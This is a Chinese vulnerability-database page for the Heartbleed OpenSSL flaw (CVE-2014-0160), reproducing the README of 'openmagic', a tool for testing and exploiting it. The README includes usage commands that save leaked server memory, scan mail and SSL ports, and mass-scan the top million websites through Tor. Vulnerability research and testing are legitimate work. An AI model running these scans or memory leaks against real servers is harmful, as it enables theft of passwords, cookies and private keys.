漏洞平台

POC详情： 0649dbcac63bb27a49b62e5330e63e80b7428cc9

来源

关联漏洞

标题： OpenSSL 缓冲区错误漏洞 (CVE-2014-0160)
描述：OpenSSL是OpenSSL团队开发的一个开源的能够实现安全套接层（SSL v2/v3）和安全传输层（TLS v1）协议的通用加密库，它支持多种加密算法，包括对称密码、哈希算法、安全散列算法等。 OpenSSL的TLS和DTLS实现过程中的d1_both.c和t1_lib.c文件中存在安全漏洞，该漏洞源于当处理Heartbeat Extension数据包时，缺少边界检查。远程攻击者可借助特制的数据包利用该漏洞读取服务器内存中的敏感信息(如用户名、密码、Cookie、私钥等)。以下版本的OpenSSL受到

描述

OpenSSL TLS heartbeat read overrun (CVE-2014-0160)

介绍

openmagic
=========

openmagic can assist you in the automating testing and exploiting of systems vulnerable to the *OpenSSL TLS heartbeat read overrun (CVE-2014-0160)*. The base module wraps a modified version of the "ssltest.py" program by Jared Stafford and provides the following additional features:

- Save the leaked data in a raw format for later analisys
- Resolve the IP so that only one DNS query is executed
- Use NMAP to check if the target service is alive (or filtered/closed)
- Check if the target is vulnerable
- Iterate and sleep between multiple requests

(C) ISGroup SRL http://www.isgroup.biz

Written by Francesco Ongaro (https://linkedin.com/in/ongaro)

Usage to test a specific port, like HTTPS:

```
$ ./ssltest.sh login.foo.com 443
# [Open  ] login.foo.com:443 (1.2.3.5)
# [Vuln  ] login.foo.com:443
# [Loop  ] login.foo.com:443 %1
...
# [Loop  ] login.foo.com:443 %1000
```

Usage to automatically test MTA systems:

```
$ ./sslmail.sh foobar.com
# [Closed] mx6.foobar.com:465
# [Closed] mx6.foobar.com:585
# [Open  ] mx6.foobar.com:993 (1.2.3.4)
# [Safe  ] mx6.foobar.com:993
# [Open  ] mx6.foobar.com:995 (1.2.3.4)
# [Safe  ] mx6.foobar.com:995
```

Test 30 most common SSL ports on a target:

```
$ ./sslports.sh www.foobar.com 30
# [ICSSL ] 1.2.3.6 (www.foobar.com)
# [Closed] 1.2.3.6:443 (1.2.3.6)
# [Closed] 1.2.3.6:21 (1.2.3.6)
# [Open  ] 1.2.3.6:22 (1.2.3.6)
# [Safe  ] 1.2.3.6:22 (1.2.3.6)
[..]
# [Closed] 1.2.3.6:2002 (1.2.3.6)
# [Closed] 1.2.3.6:5000 (1.2.3.6)
```

Kill all the running threads:

```
ps aux | grep ./ssltest.sh | awk '{print $2}' | xargs kill
```

Scan a large CSV file:

```
tail -n 1000 top-1m.csv | sort -r | cut -d "," -f2 | xargs -P 20 -I {} ./ssltest.sh {} 443
```

~DO NOT HARM~

Contribute to openmagic
--------

If you want to submit or propose a feature feel free to open an issue https://github.com/isgroup-srl/openmagic/issues.

Requirements
--------

You need in your $PATH the following dependencies: 

- bash
- python2.6
- nmap
- dig
- torify
- tor

文件快照


 [4.0K]  /data/pocs/0649dbcac63bb27a49b62e5330e63e80b7428cc9
├── [1.4K]  common.sh
├── [4.2K]  internetcensus2012_ssl.txt
├── [ 34K]  LICENSE
├── [2.0K]  README.md
├── [ 641]  sslmail.sh
├── [ 557]  sslports.sh
├── [4.4K]  ssltest.py
└── [ 798]  ssltest.sh

0 directories, 8 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。